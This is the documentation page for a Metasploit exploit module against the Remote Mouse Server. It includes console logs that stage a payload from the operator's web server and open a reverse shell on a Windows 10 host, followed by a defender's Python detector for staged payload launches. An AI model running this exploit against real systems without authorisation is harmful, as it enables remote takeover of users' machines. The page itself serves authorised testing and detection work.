
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/windows/misc/remote_mouse_rce.md

Vulnerable Application

This module uses the Remote Mouse Server protocol (Emote Interactive) to deploy a payload and run it from the server on versions < 4.200 (500 server response). The payload is deployed regardless of whether server authentication is required. Tested against 4.110, the current version at the time the module was written.

Version 4.110 can be downloaded from an unofficial site: https://remote-mouse.en.uptodown.com/windows/download/4546712

Verification Steps

  1. Install the application

  2. Start msfconsole

  3. Do: use exploit/windows/misc/remote_mouse_rce

  4. Set rhost and lhost as required.

  5. Do: run

  6. You should get a shell as the user who is running Remote Mouse.

Options

SLEEP

The length of time, in seconds, to sleep between each command. This gives the remote program time to process the command on screen. Defaults to 1.

PATH

The path where the payload should be downloaded/staged to. Defaults to c:\Windows\Temp\.

Scenarios

Remote Mouse 4.110 on Windows 10

resource (remote_mouse.rb)> use exploits/windows/misc/remote_mouse_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (remote_mouse.rb)> set rhosts 192.168.2.95
rhosts => 192.168.2.95
resource (remote_mouse.rb)> set lhost 192.168.2.199
lhost => 192.168.2.199
resource (remote_mouse.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/remote_mouse_rce) > run
[*] Started reverse TCP handler on 192.168.2.199:4444
[*] 192.168.2.95:1978 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.2.95:1978 - The target appears to be vulnerable. Received handshake with version: 411
[*] 192.168.2.95:1978 - Connecting
[*] 192.168.2.95:1978 - Sending Windows key
[*] 192.168.2.95:1978 - Opening command prompt
[*] 192.168.2.95:1978 - Sending stager
[*] 192.168.2.95:1978 - Using URL: http://192.168.2.199:8080/
[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging
[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging
[*] 192.168.2.95:1978 - Executing payload
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.2.95
[*] Command shell session 1 opened (192.168.2.199:4444 -> 192.168.2.95:49962) at 2022-09-27 16:33:02 -0400
[*] 192.168.2.95:1978 - Server stopped.
[!] 192.168.2.95:1978 - This exploit may require manual cleanup of 'c:\Windows\Temp\NADYvmtxr.exe' on the target

Shell Banner:
Microsoft Windows [Version 10.0.16299.125]
-----

C:\Users\windows>whoami
whoami
win10prolicense\windows

C:\Users\windows>systeminfo
systeminfo

Host Name:                 WIN10PROLICENSE
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.16299 N/A Build 16299

Remote Mouse 4.110 on Windows 10, with a password

resource (remote_mouse.rb)> use exploits/windows/misc/remote_mouse_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (remote_mouse.rb)> set rhosts 192.168.2.95
rhosts => 192.168.2.95
resource (remote_mouse.rb)> set lhost 192.168.2.199
lhost => 192.168.2.199
resource (remote_mouse.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/remote_mouse_rce) > exploit
[*] Started reverse TCP handler on 192.168.2.199:4444
[*] 192.168.2.95:1978 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.2.95:1978 - The target appears to be vulnerable. Received handshake with version: 411
[*] 192.168.2.95:1978 - Connecting
[*] 192.168.2.95:1978 - Sending Windows key
[*] 192.168.2.95:1978 - Opening command prompt
[*] 192.168.2.95:1978 - Sending stager
[*] 192.168.2.95:1978 - Using URL: http://192.168.2.199:8080/
[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging
[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging
[*] 192.168.2.95:1978 - Executing payload
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.2.95
[*] Command shell session 1 opened (192.168.2.199:4444 -> 192.168.2.95:49975) at 2022-09-27 16:36:09 -0400
[*] 192.168.2.95:1978 - Server stopped.
[!] 192.168.2.95:1978 - This exploit may require manual cleanup of 'c:\Windows\Temp\86a4GsbpomvEgUS.exe' on the target

Shell Banner:
Microsoft Windows [Version 10.0.16299.125]
-----

C:\Users\windows>
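For defenders reviewing a host where this module may have been run, the following is an added example (not code from the module or its documentation) that triages process-creation records for an executable launched from the PATH staging directory by a command prompt, which is the chain the logs above show, and lists stub files left behind after the "manual cleanup" warning. The 8-16 character alphanumeric name pattern and the ProcEvent record shape are assumptions, generalised from the two file names in the logs above.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Default of the module's PATH option (c:\Windows\Temp\), where the stub is staged.
DEFAULT_STAGING_DIR = r"c:\windows\temp"
# The two cleanup warnings on this page name 9- and 15-character alphanumeric stubs
# (NADYvmtxr.exe, 86a4GsbpomvEgUS.exe); the 8-16 length window is an assumption.
RANDOM_STUB = re.compile(r"^[A-Za-z0-9]{8,16}\.exe$")

@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon event 1 / Security 4688 style); assumed shape."""
    parent_image: str
    image: str

def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]

def _in_dir(path: str, directory: str) -> bool:
    return path.lower().startswith(directory.lower().rstrip("\\") + "\\")

def classify_event(ev: ProcEvent, staging_dir: str = DEFAULT_STAGING_DIR) -> Optional[str]:
    """'high' for a random-named exe run from the staging dir by cmd.exe (the chain
    this module produces: open prompt, stage, execute); 'medium' for the same file
    under another parent; None when no staged stub is involved."""
    if not _in_dir(ev.image, staging_dir) or not RANDOM_STUB.match(_basename(ev.image)):
        return None
    return "high" if _basename(ev.parent_image).lower() == "cmd.exe" else "medium"

def find_staged_payload_launches(events, staging_dir: str = DEFAULT_STAGING_DIR) -> List[str]:
    """Image paths of events that look like staged-payload launches, 'high' hits first."""
    hits = [(classify_event(ev, staging_dir), ev.image) for ev in events]
    hits = sorted((h for h in hits if h[0]), key=lambda h: h[0] != "high")
    return [image for _, image in hits]

def leftover_stubs(file_listing: List[str], staging_dir: str = DEFAULT_STAGING_DIR) -> List[str]:
    """Stub-looking files still on disk after a session (the 'manual cleanup' warning)."""
    return [p for p in file_listing if _in_dir(p, staging_dir) and RANDOM_STUB.match(_basename(p))]

# Constructed sample events; the two stub names are the ones shown in this page's logs.
CONSTRUCTED_EVENTS = [
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\Temp\NADYvmtxr.exe"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\Temp\86a4GsbpomvEgUS.exe"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\Temp\NADYvmtxr.exe"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\Temp\vc_redist.x64.exe"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Program Files\Remote Mouse\RemoteMouse.exe"),
]
```

Pass a non-default staging_dir when the operator's PATH option was changed, since the rule keys on that directory.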